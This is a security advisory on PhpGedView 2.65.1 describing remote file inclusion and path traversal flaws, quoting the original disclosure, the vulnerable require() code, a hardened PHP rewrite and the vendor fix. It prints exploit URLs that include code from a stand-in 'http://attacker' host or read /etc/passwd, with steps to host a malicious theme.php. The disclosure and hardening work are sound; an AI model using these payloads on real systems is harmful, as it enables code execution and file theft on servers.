PhpGedView Include File Holes in 'conf' Files Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID: 1008892
CVE Reference: CAN-2004-0127, CAN-2004-0128
Updated: Feb 4 2004
Original Entry Date: Jan 30 2004
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Advisory: netVigilance
Version(s): 2.65.1 and prior versions
Description: Cedric Cochin of netVigilance reported several include file vulnerabilities in PhpGedView. A remote user can execute arbitrary PHP code and operating system commands on the target system. A remote authenticated user with 'admin' privileges can view files on the target system.
It is reported that several scripts (those ending in '_conf.php') do not properly validate user-supplied input in the $PGV_BASE_DIRECTORY variable. A remote user can supply a specially crafted URL to cause remote PHP code, including operating system commands, to be included by and executed on the target system with the privileges of the target web service [CVE: CAN-2004-0128]. A demonstration exploit URL is provided that will cause the '[GED_File]_conf.php' script located at the 'attacker' site to be included and executed on the target system:
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
The system is only affected when PHP register_globals is On, the report said.
It is also reported that a remote authenticated user with 'admin' privileges can view arbitrary files on the system with the privileges of the web service due to an input validation flaw in the 'gedcom_config' parameter of the 'editconfig_gedcom.php' script [CVE: CAN-2004-0127]. A demonstration exploit URL is provided:
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
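Both flaws above are unvalidated require() calls: one takes the file name from a request parameter (path traversal), the other builds the path from variables that register_globals lets the query string set (remote inclusion). The following is an added example, not phpGedView's own code, showing each unsafe pattern next to a hardened replacement; function names, the config directory argument and the theme list are assumptions for illustration.

```php
<?php
// Added example (not phpGedView's code). Shows the two unsafe require() patterns
// from the advisory and a hardened version of each. Names are illustrative.

// Flaw 1 (editconfig_gedcom.php): the config file name is taken from the request
// and passed straight to require(), so "../../../../../../etc/passwd" is read.
function config_name_vulnerable(array $post): string {
    return !empty($post['gedcom_config']) ? $post['gedcom_config'] : 'config_gedcom.php';
    // caller does require() on this value unchanged
}

// Hardened: drop any directory component, allow only a simple *.php name, and
// check that the resolved path is still inside the configured directory.
function config_path_hardened(array $post, string $config_dir): string {
    $name = !empty($post['gedcom_config']) ? basename((string)$post['gedcom_config'])
                                           : 'config_gedcom.php';
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $name)) {
        throw new InvalidArgumentException('config name rejected');
    }
    $base = realpath($config_dir);
    $path = realpath($config_dir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('config file outside allowed directory');
    }
    return $path;
}

// Flaw 2 ([GED_File]_conf.php): with register_globals=On, $PGV_BASE_DIRECTORY and
// $THEME_DIR can be injected via the URL, so require() can fetch http://attacker/...
// Hardened: never derive the base from request data; pin it to the script's own
// directory and map the requested theme onto a fixed list of known themes.
function theme_path_hardened(string $requested_theme, array $known_themes): string {
    $base  = __DIR__ . DIRECTORY_SEPARATOR;                 // not attacker controlled
    $theme = in_array($requested_theme, $known_themes, true) ? $requested_theme : 'standard';
    return $base . 'themes' . DIRECTORY_SEPARATOR . $theme . DIRECTORY_SEPARATOR . 'theme.php';
}
// Defence in depth: allow_url_include=Off (PHP >= 5.2) or allow_url_fopen=Off on
// older PHP stops require() from loading http:// paths even if a variable leaks in.

// Demo on a constructed traversal input: the hardened loader rejects it.
try {
    config_path_hardened(['gedcom_config' => '../../../../../../etc/passwd'], __DIR__);
} catch (Exception $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
echo theme_path_hardened('http://attacker', ['standard', 'xenea']) . "\n"; // falls back to standard
```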
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
A remote authenticated user with 'admin' privileges can view arbitrary files on the target system with the privileges of the target web service.
Solution: The vendor has released a fixed version (2.65.2), available at:
http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517
Vendor URL: phpgedview.sourceforge.net/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Cedric Cochin <cco@netvigilance.com>
Message History:
None.
Source Message Contents
Date: Fri, 30 Jan 2004 00:27:33 +0100
From: Cedric Cochin <cco@netvigilance.com>
Subject: PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
################################################################################
Summary :
phpGedView is an open source system for online viewing of Gedcom information
(family tree and genealogy information). Multiple PHP Code Injection
vulnerabilities exist in the phpGedView product. They enable a malicious user
to access arbitrary files or execute commands on the server.
################################################################################
Details :
Multiple PHP scripts can be exploited to perform PHP Code Injection.
Vulnerable Systems:
* phpGedView version 2.65.1 and prior
Release Date :
January 30, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
or
http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd
- -- HTTP Request --
Code impacted : editconfig_gedcom.php
// editconfig_gedcom.php as shipped: the file name to include is taken from the
// request (or register_globals) and handed to require() without any validation
if (empty($gedcom_config)) {
    if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"];
    else $gedcom_config = "config_gedcom.php";
}

require($gedcom_config);
Both the GET and POST requests will work even if PHP register_globals is Off.
-------------------------------------------
II - PHP Injection
(HIGH Risk no authentication needed)
- -- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
- -- HTTP Request --
Code impacted : [GED_File]_conf.php
// [GED_File]_conf.php as shipped: with register_globals On, both variables in the
// include path can be supplied from the query string
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
    require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
else {
    $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
    require($THEME_DIR."theme.php");
}
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM file used. Just perform
an http://[target]/session.php request; the GEDCOM file will be in the argument of the
login.php call.
The attacker has to create on his web site a directory called themes/standard, and
a file theme.php.
For example: theme.php = <?php print "<?php phpinfo();?>" ;?>
and the request will execute the phpinfo() command on the vulnerable target.
################################################################################
Vendor Status :
The information has been provided to John Finlay the PhpGedView Project Manager.
A new release 2.65.2 with fixes for these vulnerabilities is available.
- --> http://phpgedview.sourceforge.net/
- --> http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, inc.
<cco@netvigilance.com>